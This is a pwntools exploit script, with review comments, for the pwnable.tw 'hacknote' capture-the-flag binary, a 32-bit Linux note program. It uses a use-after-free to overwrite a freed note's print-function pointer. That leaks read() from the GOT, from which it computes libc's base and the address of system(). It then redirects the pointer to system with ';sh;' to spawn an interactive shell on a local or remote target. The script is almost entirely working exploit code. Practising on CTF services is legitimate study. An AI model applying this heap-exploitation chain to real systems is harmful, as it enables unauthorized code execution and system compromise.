from pwn import *
# pwntools context: the target is a 32-bit Linux binary.
context(os='linux', arch='i386')
# Remote challenge endpoint; only used when the script is started with '-r'.
HOST = 'chall.pwnable.tw'
PORT = 10102
# Address inside ./hacknote. By its name this is the note-printing routine;
# NOTE(review): not verified here — confirm against the binary's symbols.
PRINT_NOTE_FN = 0x804862b
# Offsets of read() and system() inside the target's libc. These are
# build-specific: against a different libc build both values shift and the
# addresses computed from them further down would be wrong.
LIBC_READ_OFFSET = 0xd41c0
LIBC_SYSTEM_OFFSET = 0x3a940
# Local copy of the challenge binary; its GOT is looked up later in the script.
elf = ELF('./hacknote')
class Note:
    """Thin wrapper around the numbered menu of the ./hacknote program.

    Every interaction waits for the next ':' prompt and then sends the
    answer, so the tube's ``sendafter`` does all the pacing.  The tube's
    ``send``, ``sendline``, ``recv``, ``recvuntil`` and ``sendafter`` are
    re-exposed as attributes so callers can also talk to the connection
    directly (the script reads the reply with ``note.recv``).
    """

    # Tube methods forwarded 1:1 onto the wrapper instance.
    _FORWARDED = ('send', 'sendline', 'recv', 'recvuntil', 'sendafter')

    def __init__(self, conn):
        for method_name in self._FORWARDED:
            setattr(self, method_name, getattr(conn, method_name))

    def _menu(self, choice, *answers):
        """Pick menu item *choice*, then answer each follow-up ':' prompt in order.

        Values are sent exactly as given (no conversion), matching the
        original one-``sendafter``-per-prompt behaviour.
        """
        for item in (choice,) + answers:
            self.sendafter(':', item)

    def add_note(self, size, data):
        """Menu 1: create a note of *size* bytes holding *data*."""
        self._menu('1', str(size), data)

    def delete_note(self, note_id):
        """Menu 2: delete the note at index *note_id*."""
        self._menu('2', str(note_id))

    def print_note(self, note_id):
        """Menu 3: print the note at index *note_id* (reply is left in the tube)."""
        self._menu('3', str(note_id))
# Target selection: '-r' connects to the remote challenge service, anything
# else spawns the local binary. `sys` is available through pwntools' star import.
# NOTE(review): payloads mix str ("AAAA") and bytes (b';sh;'), which points at
# Python 2-era pwntools — confirm the interpreter version before running.
if len(sys.argv) > 1 and sys.argv[1] == '-r':
    conn = remote(HOST, PORT)
else:
    conn = process(['./hacknote'])
log.info('Pwning start')
note = Note(conn)
# create 2 notes (indices 0 and 1), 16 bytes each
note.add_note(16, "AAAA")
note.add_note(16, "BBBB")
# delete 2 notes
# UAF: per the author's comment the target keeps deleted notes reachable
# through the menu, and the rest of the script relies on that. On the
# target side the fix is to clear the note entry on delete and to reject
# print/delete on a cleared slot.
note.delete_note(0)
note.delete_note(1)
# leak libc read address
# print_note(8, read_got_addr)
# Third note (index 2), 8 bytes: PRINT_NOTE_FN followed by the GOT slot of
# read() taken from the local ELF.
# NOTE(review): on Python 3 pwntools the got table is keyed by str, so the
# bytes key b'read' may raise KeyError there — confirm the pwntools version.
note.add_note(8, p32(PRINT_NOTE_FN) + p32(elf.got[b'read']))
# leak libc
note.print_note(0)
# NOTE(review): recv(4) may return fewer than 4 bytes on a slow link, and
# u32 would then fail; recvn(4) is the exact-length read.
ret = u32(note.recv(4))
# calc system address (offsets are libc-build specific, see the constants above)
libc_base = ret - LIBC_READ_OFFSET
print("libc_base: ", hex(libc_base))
system_addr = libc_base + LIBC_SYSTEM_OFFSET
print("system: ", hex(system_addr))
# delete note (index 2)
note.delete_note(2)
# system(";sh;")
note.add_note(8, p32(system_addr) + b';sh;')
note.print_note(0)
conn.interactive()